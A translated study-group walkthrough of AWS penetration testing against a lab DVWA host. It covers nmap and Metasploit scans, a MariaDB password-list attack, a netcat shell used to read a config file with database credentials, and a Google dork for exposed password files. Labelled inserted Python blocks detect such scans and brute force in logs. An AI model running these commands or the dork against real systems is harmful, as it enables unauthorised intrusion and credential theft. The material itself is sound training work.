AHSS - Last study [AWS Hacking & Security Study, 1st cohort]

*This is the AWS Hacking & Security Study run by Gasida of the cloudNet@ team.

AWS Penetration Testing

  • AWS Customer Support Policy for Penetration Testing – link
    • AWS customers may carry out security assessments or penetration tests against their AWS infrastructure without prior approval for the services listed under "Permitted services" in the next section. AWS also permits customers to perform tests by hosting security assessment tools within AWS IP space, or with AWS or a contracted third-party on-premises cloud provider. All security testing that includes command and control (C2) requires prior approval.
    • Make sure these activities comply with the policy stated below. Note: customers may not perform security assessments of the AWS infrastructure or of AWS services themselves. If you discover a security issue within an AWS service during an assessment, **contact the AWS Security team immediately**.
    • If AWS receives an abuse report for activity related to security testing, it forwards the report to the customer. When responding, describe your use case in detail in the approved language, including contact information that can be shared with the third-party reporter. Learn more **here**.
    • Resellers of AWS services are responsible for their customers' security testing activities.

Permitted services

  • Amazon EC2 instances, WAF, NAT Gateways, Elastic Load Balancers
  • Amazon RDS
  • Amazon CloudFront
  • Amazon Aurora
  • Amazon API Gateway
  • AWS AppSync
  • AWS Lambda and Lambda@Edge functions
  • Amazon Lightsail resources
  • Amazon Elastic Beanstalk environments
  • Amazon Elastic Container Service
  • AWS Fargate
  • Amazon Elasticsearch
  • Amazon FSx
  • AWS Transit Gateway
  • S3-hosted applications (targeting S3 buckets themselves is strictly prohibited)

Prohibited activities

  • DNS zone walking via Amazon Route 53 Hosted Zones
  • DNS hijacking via Route 53
  • DNS pharming via Route 53
  • Denial of Service (DoS), Distributed Denial of Service (DDoS), simulated DoS, simulated DDoS (subject to the **DDoS Simulation Testing Policy**)
  • Port flooding
  • Protocol flooding
  • Request flooding (login request flooding, API request flooding)

Terms and conditions: security testing

  • Limited by service, network bandwidth, requests per minute and instance type.
  • Use of this service is subject to the **Amazon Web Services Customer Agreement** between you and AWS.
  • You must comply with AWS policy on the use of security assessment tools and services (covered in the next section).

→ Findings of vulnerabilities or other issues that are a direct result of AWS tools or services must be reported to the **AWS Security team** within 24 hours of completing the test.

https://www.notion.so/surho/5-1ca39a8ed36643fdabeff6a42a6c2bab?pvs=4#3473c99a857c46b68d9434ff38841026

AWS Penetration Testing

https://github.com/PacktPublishing/AWS-Penetration-Testing

Lab environment: deploy the stack with the name awspt, and enter 'your home IP/32' as the value of SgIngressSshCidr

*awspt file download path: https://blog.naver.com/sjmtomm (after opening the link, it is in the "commands" category)

# Amazon Linux 2: install the MATE desktop, update, reboot and set a password for ec2-user
sudo amazon-linux-extras install mate-desktop1.x -y
sudo yum update
sudo reboot
sudo passwd ec2-user
...

# install the TigerVNC server and set the VNC password
sudo yum install tigervnc-server -y
vncpasswd

Kali Linux introduction and deployment: (formerly BackTrack) a Debian-based Linux that bundles penetration-testing tools as packages – link; supports many environments – link; default account

  • Select the AMI from Marketplace and launch: t3.medium (2 vCPU, 4 GB memory), VPC (My-VPC), public IP, Subnet (My-Public-SN), SG (select the one that includes MySG2), gp3 (30) ⇒ subscription confirmation takes about 5 minutes
#!/bin/bash
# user data run at first boot: install Metasploit
apt update
apt install metasploit-framework -y
  • Check access after deployment
# SSH into the Kali instance with the key pair chosen at launch
ssh -i <ssh key file> kali@IP

# check basic system information
hostnamectl
==
Static hostname: kali
       Icon name: computer-vm
         Chassis: vm 🖴
      Machine ID: ec2cb5f4eb7b2393627ce953ee208247
         Boot ID: b764e74681e140fc8bb6418053764d36
  Virtualization: amazon
Operating System: Kali GNU/Linux Rolling
          Kernel: Linux 6.3.0-kali1-cloud-amd64
    Architecture: x86-64
 Hardware Vendor: Amazon EC2
  Hardware Model: t3.medium
Firmware Version: 1.0
   Firmware Date: Mon 2017-10-16
    Firmware Age: 5y 11month 1w 2d
==

# switch to root: most vulnerability tools require root-level privileges
sudo su
whoami
==
root
==

# ping test (to DVWA)
ping -c 2 10.0.0.10
==
64 bytes from 10.0.0.10: icmp_seq=1 ttl=255 time=0.677 ms
64 bytes from 10.0.0.10: icmp_seq=2 ttl=255 time=0.284 ms
==

# check that the AWS CLI is installed
aws --version
==
aws-cli/2.12.0 Python/3.11.4 Linux/6.3.0-kali1-cloud-amd64 source/x86_64.kali.2023 prompt/off
==
  • (Optional) Install and enable xrdp on Kali, then connect over RDP → convenient for checking the vulnerability tools, using the Tor browser and the various web proxy tools

https://www.kali.org/tools/

https://www.kali.org/docs/cloud/aws/

Never connect directly to, or attempt to attack, the targets found through these searches!

  • Web archives: cached copies of web pages – link ← Internet Archive site (like Google's cached pages: shows the page as it looked at that point in time)
  • Photo information – link (Korean) ← a site for viewing the metadata of an image
  • Using Google
inurl:/wp-content/uploads/ ext:txt "username" AND "password" | "pwd" | "pw"
  • Shodan: information on exposed or vulnerable servers on the internet – link

  └ prints the CVE list for the target in question

  • NMAP
# The -sV switch enumerates the version of the service. 
# The -sC switch is for using scripts in conjunction with your scan.
nmap -sV -sC -p 22 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:18 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.00013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 32:21:a7:9c:1d: (RSA)
|   256 ea:25:0 (ECDSA)
|_  256 f0:63:40 (ED25519)
MAC Address: 02:10:9 (Unknown)
==

nmap -sV -sC -p 80 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:28 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.57 (() PHP/8.2.9)
| http-title: Login :: Damn Vulnerable Web Application (DVWA)
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 () PHP/8.2.9
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 02:10: (Unknown)
==

nmap -sV -sC -p 3306 10.0.0.10
==
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 15:29 UTC
Nmap scan report for ip-10-0-0-10.ap-northeast-2.compute.internal (10.0.0.10)
Host is up (0.000086s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 02:10 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
==
# Exploring Metasploit (already installed)
#apt update && apt install metasploit-framework -y
msfdb -h
==
Manage the metasploit framework database

You can use an specific port number for the
PostgreSQL connection setting the PGPORT variable
in the current shell.

Example: PGPORT=5433 msfdb init

  msfdb init     # start and initialize the database
  msfdb reinit   # delete and reinitialize the database
  msfdb delete   # delete database and stop using it
  msfdb start    # start the database
  msfdb stop     # stop the database
  msfdb status   # check service status
  msfdb run      # start the database and run msfconsole
==

msfdb run
-----------------------------------
search rdp
search wordpress
search fortinet

search TCP portscan
==
Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                   normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/portscan/xmas                        normal  No     TCP "XMas" Port Scanner
   2  auxiliary/scanner/portscan/ack                         normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/tcp                         normal  No     TCP Port Scanner
   4  auxiliary/scanner/portscan/syn                         normal  No     TCP SYN Port Scanner
==

use auxiliary/scanner/portscan/tcp
options
==
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.
==

# specify the target host
set RHOSTS 10.0.0.10
options
==
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds


View the full module info with the info, or info -d command.
==
# run
run
==
[+] 10.0.0.10:            - 10.0.0.10:22 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:80 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:111 - TCP OPEN
[+] 10.0.0.10:            - 10.0.0.10:3306 - TCP OPEN
[*] 10.0.0.10:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
==

# RDP scanning
use auxiliary/scanner/rdp/rdp_scanner
options

exit
-----------------------------------
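The portscan above sweeps 10.0.0.10 from Kali (10.0.0.20); on the defending side the same sweep shows up in VPC Flow Logs as one source touching many destination ports within seconds, most of them REJECTed by the security group. The following is an added example, not code from the page or from the Packt repository, that builds a constructed flow-log sample in the default version-2 field order (account id and ENI id are made up) and flags such sweeps with a sliding time window:

```python
"""Spot a TCP port sweep in VPC Flow Logs (added example, constructed data)."""
from collections import defaultdict

# Default VPC Flow Log (version 2) field order:
# version account-id interface-id srcaddr dstaddr srcport dstport protocol
# packets bytes start end action log-status
def _build_sample():
    """Constructed sample: 10.0.0.20 sweeps ports 1-30 on 10.0.0.10 (22/80 open, the
    rest rejected by the security group); 10.0.0.30 is a normal client using port 80."""
    base = 1695655080                      # arbitrary epoch start time
    lines = []
    for i, port in enumerate(range(1, 31)):
        action = "ACCEPT" if port in (22, 80) else "REJECT"
        lines.append(f"2 123456789012 eni-0a1b2c3d 10.0.0.20 10.0.0.10 {40000 + i} {port} 6 "
                     f"1 60 {base + i} {base + i + 1} {action} OK")
    for i in range(30):
        lines.append(f"2 123456789012 eni-0a1b2c3d 10.0.0.30 10.0.0.10 {50000 + i} 80 6 "
                     f"5 400 {base + i} {base + i + 1} ACCEPT OK")
    return "\n".join(lines)

SAMPLE_FLOW_LOG = _build_sample()

def parse_flow_log(text):
    """Parse version-2 flow log lines into dicts; skip headers and malformed lines."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) != 14 or f[0] != "2":
            continue
        records.append({"src": f[3], "dst": f[4], "dstport": int(f[6]),
                        "proto": int(f[7]), "start": int(f[9]), "action": f[12]})
    return records

def find_port_sweeps(records, min_ports=15, window=60):
    """Return {(src, dst): ports} for source/destination pairs that touched at least
    min_ports distinct TCP destination ports inside any `window`-second span."""
    per_pair = defaultdict(list)
    for r in records:
        if r["proto"] == 6:                # TCP only
            per_pair[(r["src"], r["dst"])].append((r["start"], r["dstport"]))
    hits = {}
    for pair, events in per_pair.items():
        events.sort()                      # by start time
        best, lo = set(), 0
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > window:
                lo += 1                    # slide the window forward
            ports = {p for _, p in events[lo:hi + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            hits[pair] = best
    return hits
```

The benign client repeats port 80 thirty times and is never flagged, which is why the rule counts distinct ports rather than connection attempts.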
  • whois
apt install whois -y
whois packpub.com
  • DB
#
nmap -p 3306 -Pn -sV 10.0.0.10

# create a password file
# back in the Kali shell (exit from msfconsole)
echo "aws" >> mypw.txt
echo "admin" >> mypw.txt
echo "qwe123" >> mypw.txt
cat mypw.txt

#
msfdb run
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.0.0.10
set USERNAME dvwa
set STOP_ON_SUCCESS true
set PASS_FILE mypw.txt
run
==
[-] 10.0.0.10:3306        - 10.0.0.10:3306 - Unsupported target version of MySQL detected. Skipping.
[*] 10.0.0.10:3306        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
==

...
use auxiliary/scanner/mysql/mysql_version
options
set rhosts 10.0.0.10
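The mysql_login module skipped this target, but a password-list attack that does run against MariaDB leaves a burst of "Access denied" lines in the server's error log, one per attempt from the same source and user. The following is an added example, not from the page, that parses constructed MariaDB error-log lines (assuming the server runs with log_warnings at 2 or higher so that failed logins are written at all) and flags a source/user pair that reaches a failure threshold inside a sliding window:

```python
"""Flag a MariaDB login brute force from error-log lines (added example, constructed data)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in MariaDB error-log style. Assumption: log_warnings >= 2, otherwise
# failed logins never reach the error log. The dvwa user and the 10.0.0.20 source are the
# lab values; 10.0.0.30 and the thread ids are made up.
SAMPLE_ERROR_LOG = """\
2023-09-25 15:40:01 41 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:40:01 42 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:40:02 43 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:40:02 44 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:40:03 45 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:40:03 46 [Warning] Access denied for user 'dvwa'@'10.0.0.20' (using password: YES)
2023-09-25 15:41:10 47 [Warning] Access denied for user 'dvwa'@'10.0.0.30' (using password: YES)
2023-09-25 15:55:00 48 [Note] InnoDB: Buffer pool(s) load completed at 230925 15:55:00
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)

def parse_denied(text):
    """Return (timestamp, user, source host) for every failed-login line."""
    events = []
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["host"]))
    return events

def find_bruteforce(events, threshold=5, window_seconds=60):
    """Return {(host, user): most failures seen in one window} for pairs that reach
    `threshold` failed logins within `window_seconds`."""
    by_key = defaultdict(list)
    for ts, user, host in events:
        by_key[(host, user)].append(ts)
    alerts = {}
    for key, times in by_key.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while (times[hi] - times[lo]).total_seconds() > window_seconds:
                lo += 1                       # drop failures that fell out of the window
            count = hi - lo + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts
```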

# CVE search: Nmap NSE – link
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
# use nmap to detect the service version (-sV) on a specific port (3306 here) of a specific IP (10.0.0.10 here) and run the vulscan script (vulscan.nse)
nmap -sV --script=vulscan/vulscan.nse -p 3306 10.0.0.10
==
# shows the vulnerabilities found
SecurityFocus - https://www.securityfocus.com/bid/:
| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
| [65757] MariaDB Prior to 5.5.35 Remote Multiple Denial of Service Vulnerabilities

==
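The vulscan report is free text, so for triage it helps to turn it into records and pull out the CVE ids. The following is an added example, not vulscan's or the page's own code, that parses a constructed excerpt in the layout shown above: the SecurityFocus lines are the ones from this scan, and the MITRE section is added for illustration on the assumption that it uses the same "| [id] title" layout:

```python
"""Parse vulscan text into structured findings (added example, constructed data)."""
import re
from collections import Counter

# Constructed excerpt following the format shown on the page: a "| <source> - <url>:"
# header followed by "| [<id>] <title>" entries. The SecurityFocus block is from the
# scan above; the MITRE block is made up here and assumes the same layout.
SAMPLE_VULSCAN = """\
| SecurityFocus - https://www.securityfocus.com/bid/:
| [96162] MariaDB and MySQL CVE-2017-3302 Denial of Service Vulnerability
| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
| [65757] MariaDB Prior to 5.5.35 Remote Multiple Denial of Service Vulnerabilities
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2017-3302] MariaDB and MySQL denial of service
| [CVE-2016-2047] SSL certificate validation bypass in MariaDB/MySQL/Percona
"""

HEADER_RE = re.compile(r"^\|\s*(?:vulscan:\s*)?(?P<source>.+?) - (?P<url>\S+):\s*$")
ENTRY_RE = re.compile(r"^\|\s*\[(?P<id>[^\]]+)\]\s+(?P<title>.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_vulscan(text):
    """Return a list of {source, id, title, cves} dicts, one per finding line."""
    findings, source = [], None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            source = h["source"]            # remember which database the entries belong to
            continue
        e = ENTRY_RE.match(line)
        if e and source:
            cves = sorted(set(CVE_RE.findall(e["id"] + " " + e["title"])))
            findings.append({"source": source, "id": e["id"],
                             "title": e["title"], "cves": cves})
    return findings

def summarize(findings):
    """Count findings per source and collect the distinct CVE ids across all sources."""
    per_source = Counter(f["source"] for f in findings)
    cves = sorted({c for f in findings for c in f["cves"]})
    return dict(per_source), cves
```

Entries without a CVE id (the BID 65757 line) are kept with an empty cves list, so nothing from the scan is silently dropped.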
  • Reverse shell: netcat, lambda

DVWA 10.0.0.10

# on the DVWA host: install netcat, then listen on 4444 and attach /bin/sh to the connection
#yum install nc -y
nc -lvp 4444 -e /bin/sh

Kali 10.0.0.20

# from Kali: connect to the listener and run commands on DVWA
nc 10.0.0.10 4444
pwd
ip a
id
ls /var/www/html/config
cat /var/www/html/config/config.inc.php

Exploring AWS Metasploit modules

msf6 > search aws

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/unix/webapp/awstatstotals_multisort                    2008-08-26       excellent  Yes    AWStats Totals multisort Remote Command Execution
   1   exploit/unix/webapp/awstats_configdir_exec                     2005-01-15       excellent  Yes    AWStats configdir Remote Command Execution
   2   exploit/unix/webapp/awstats_migrate_exec                       2006-05-04       excellent  Yes    AWStats migrate Remote Command Execution
   3   exploit/linux/misc/accellion_fta_mpipe2                        2011-02-07       excellent  No     Accellion FTA MPIPE2 Command Execution
   4   exploit/multi/browser/adobe_flash_hacking_team_uaf             2015-07-06       great      No     Adobe Flash Player ByteArray Use After Free
   5   exploit/multi/browser/adobe_flash_nellymoser_bof               2015-06-23       great      No     Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
   6   auxiliary/cloud/aws/enum_ssm                                                    normal     No     Amazon Web Services EC2 SSM enumeration
   7   auxiliary/cloud/aws/enum_ec2                                                    normal     No     Amazon Web Services EC2 instance enumeration
   8   auxiliary/cloud/aws/enum_iam                                                    normal     No     Amazon Web Services IAM credential enumeration
   9   auxiliary/cloud/aws/enum_s3                                                     normal     No     Amazon Web Services S3 instance enumeration
   10  exploit/windows/rdp/cve_2019_0708_bluekeep_rce                 2019-05-14       manual     Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   11  exploit/linux/http/cisco_prime_inf_rce                         2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   12  exploit/linux/http/cisco_ucs_rce                               2019-08-21       excellent  Yes    Cisco UCS Director Unauthenticated Remote Code Execution
   13  payload/generic/shell_bind_aws_ssm                                              normal     No     Command Shell, Bind SSM (via AWS API)
   14  post/multi/escalate/aws_create_iam_user                                         normal     No     Create an AWS IAM User
   15  post/windows/manage/dell_memory_protect                                         manual     No     Dell DBUtilDrv2.sys Memory Protection Modifier
   16  exploit/windows/local/cve_2021_21551_dbutil_memmove            2021-05-04       good       Yes    Dell DBUtil_2_3.sys IOCTL memmove
   17  exploit/linux/local/docker_runc_escape                         2019-01-01       manual     No     Docker Container Escape Via runC Overwrite
   18  exploit/linux/smtp/exim_gethostbyname_bof                      2015-01-27       great      Yes    Exim GHOST (glibc gethostbyname) Buffer Overflow
   19  post/multi/gather/aws_ec2_instance_metadata                                     normal     No     Gather AWS EC2 Instance Metadata
   20  exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce  2016-03-28       excellent  Yes    HID discoveryd command_blink_on Unauthenticated RCE
   21  exploit/hpux/lpd/cleanup_exec                                  2002-08-28       excellent  No     HP-UX LPD Command Execution
   22  exploit/multi/misc/jboss_remoting_unified_invoker_rce          2019-12-11       excellent  Yes    JBOSS EAP/AS Remoting Unified Invoker RCE
   23  auxiliary/admin/aws/aws_launch_instances                                        normal     No     Launches Hosts in AWS
   24  exploit/windows/browser/ms13_055_canchor                       2013-07-09       normal     No     MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
   25  exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc     2016-09-23       excellent  Yes    MagniComp SysInfo mcsiwrapper Privilege Escalation
   26  exploit/linux/upnp/miniupnpd_soap_bof                          2013-03-27       normal     Yes    MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
   27  auxiliary/dos/upnp/miniupnpd_dos                               2013-03-27       normal     No     MiniUPnPd 1.4 Denial of Service (DoS) Exploit
   28  exploit/openbsd/local/dynamic_loader_chpass_privesc            2019-12-11       excellent  Yes    OpenBSD Dynamic Loader chpass Privilege Escalation
   29  exploit/unix/webapp/pajax_remote_exec                          2006-03-30       excellent  No     PAJAX Remote Command Execution
   30  exploit/multi/upnp/libupnp_ssdp_overflow                       2013-01-29       normal     No     Portable UPnP SDK unique_service_name() Remote Code Execution
   31  post/hardware/rftransceiver/transmitter                                         normal     No     RF Transceiver Transmitter
   32  exploit/linux/http/realtek_miniigd_upnp_exec_noauth            2015-04-24       normal     Yes    Realtek SDK Miniigd UPnP SOAP Command Execution
   33  exploit/linux/http/piranha_passwd_exec                         2000-04-04       excellent  No     RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
   34  exploit/multi/http/rocket_servergraph_file_requestor_rce       2013-10-30       great      Yes    Rocket Servergraph Admin Center fileRequestor Remote Code Execution
   35  auxiliary/scanner/smtp/smtp_relay                                               normal     No     SMTP Open Relay Detection
   36  exploit/multi/http/sflog_upload_exec                           2012-07-06       excellent  Yes    Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
   37  exploit/windows/browser/java_basicservice_impl                 2010-10-12       excellent  No     Sun Java Web Start BasicServiceImpl Code Execution
   38  exploit/windows/antivirus/symantec_endpoint_manager_rce        2014-02-24       excellent  Yes    Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution
   39  exploit/linux/http/terramaster_unauth_rce_cve_2021_45837       2021-12-24       excellent  Yes    TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.
   40  post/multi/gather/aws_keys                                                      normal     No     UNIX Gather AWS Keys
   41  payload/cmd/unix/bind_aws_instance_connect                                      normal     No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   42  post/windows/gather/credentials/purevpn_cred_collector                          normal     No     Windows Gather PureVPN Client Credential Collector
   43  auxiliary/scanner/http/yaws_traversal                          2011-11-25       normal     No     Yaws Web Server Directory Traversal
   44  exploit/unix/webapp/phpbb_highlight                            2004-11-12       excellent  No     phpBB viewtopic.php Arbitrary Code Execution

Resource cleanup

Delete Kali → delete the CloudFormation stack
